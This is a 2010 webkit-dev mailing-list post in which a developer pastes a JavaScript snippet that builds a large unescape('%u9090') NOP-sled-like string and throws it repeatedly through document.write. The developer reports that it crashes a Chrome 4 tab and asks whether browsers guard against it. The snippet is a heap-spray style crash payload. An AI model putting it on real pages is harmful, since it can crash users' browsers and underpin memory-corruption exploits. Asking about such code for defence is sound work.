[webkit-dev] Regarding malicious javascript detection

Nilesh Patil vniles at gmail.com
Sat Apr 17 02:49:16 PDT 2010


Hi

I have one doubt about javascript that does malicious things. Consider
following javascript.

<script language="JavaScript">
    var n=unescape("%u9090");
    var
s=unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000");
    for(var i=0;i<64;i++){
        n=n+n;
        document.write('<script>throw n+s;</scr'+'ipt>');
    }
</script>

Above code causes exception and there by causing crash. Though Chrome doesnt
close. I am not sure what this scrpt does, but i think this is something to
do with 'throw' in JavaScript.
Maybe something to do with overflow.
My doubt is,

Is there any kind of handling done for above scenario which are potential
for hacking ?

I have Chrome 4.1.249.1045 (42898)  on which above script crashes Chrome
page.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webkit.org/pipermail/webkit-dev/attachments/20100417/8b2777aa/attachment.html>


More information about the webkit-dev mailing list